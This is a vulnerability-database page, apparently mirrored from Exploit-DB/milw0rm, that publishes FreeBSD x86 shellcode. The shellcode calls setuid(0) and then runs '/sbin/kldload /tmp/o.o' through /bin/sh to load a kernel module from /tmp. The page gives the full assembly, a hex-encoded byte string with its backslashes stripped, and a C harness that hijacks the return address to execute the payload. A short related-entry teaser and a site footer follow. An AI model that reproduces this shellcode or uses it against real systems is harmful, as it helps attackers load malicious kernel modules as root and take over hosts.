FreeBSD/x86 – Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

FreeBSD/x86 – Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)

漏洞ID 1054675 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-FreeBSD/x86 – Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)-安全小百科CVE编号 N/A
图片[2]-FreeBSD/x86 – Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 FreeBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13275
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* The kldload shellcode
   setuid(0)
   loads /tmp/o.o kernel module

   Size	74 bytes
   OS   FreeBSD
		/rootteam/dev0id 	(www.sysworld.net)
			[email protected]

BITS	32
jmp	short	callme
main:
	pop	esi
	xor	eax,eax
	mov	al,0x17
	push	eax
	int	0x80
	xor	eax,eax
	push	eax
	push long	0x68732f6e
	push long	0x69622f2f
	mov	ebx,esp
	push	eax
	push word	0x632d
	mov	edi,esp
	push	eax
	push	esi
	push	edi
	push	ebx
	mov	edi,esp
	push	eax
	push	edi
	push	ebx
	push	eax
	mov	al,0x3b
	int	0x80
callme:
	call	main
	db	'/sbin/kldload /tmp/o.o'
*/

char shellcode[] =
	"xebx2cx5ex31xc0xb0x17x50xcdx80x31xc0x50x68x6e"
	"x2fx73x68x68x2fx2fx62x69x89xe3x50x66x68x2dx63"
	"x89xe7x50x56x57x53x89xe7x50x57x53x50xb0x3bxcd"
	"x80xe8xcfxffxffxffx2fx73x62x69x6ex2fx6bx6cx64"
	"x6cx6fx61x64x20x2fx74x6dx70x2fx6fx2ex6f";

int
main(void)
{
	int *ret;
	ret = (int*)&ret+2;
	(*ret) = shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: ez-ipupdate执行未认证操作漏洞

ez-ipupdate执行未认证操作漏洞 漏洞ID 1202172 漏洞类型 未知 发布时间 2003-12-31 更新时间 2003-12-31 CVE编号 CVE-2003-0887 CNNVD-ID CNNVD-200312-251 漏洞平台 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享